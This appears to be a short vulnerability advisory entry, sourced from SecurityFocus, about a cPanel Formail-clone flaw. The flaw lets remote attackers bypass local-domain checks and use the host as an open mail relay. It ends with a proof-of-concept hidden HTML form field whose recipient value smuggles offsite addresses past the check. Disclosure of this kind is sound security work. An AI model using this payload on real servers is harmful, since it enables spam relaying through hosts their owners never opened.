9 lines
No EOL
470 B
Text
9 lines
No EOL
470 B
Text
source: https://www.securityfocus.com/bid/7758/info
|
|
|
|
It has been reported that cPanel is prone to an issue where a remote attacker may bypass cPanel Formail-clone local domain checks and have untrusted e-mail delivered in the context of the vulnerable host.
|
|
|
|
This issue may be exploited by an attacker to use the vulnerable host as an open relay.
|
|
|
|
<input type="hidden" name="recipient"
|
|
value="user1@offsitedomain.(localdomain)co
|
|
m, user2@offsitedomain.(localdomain)com"> |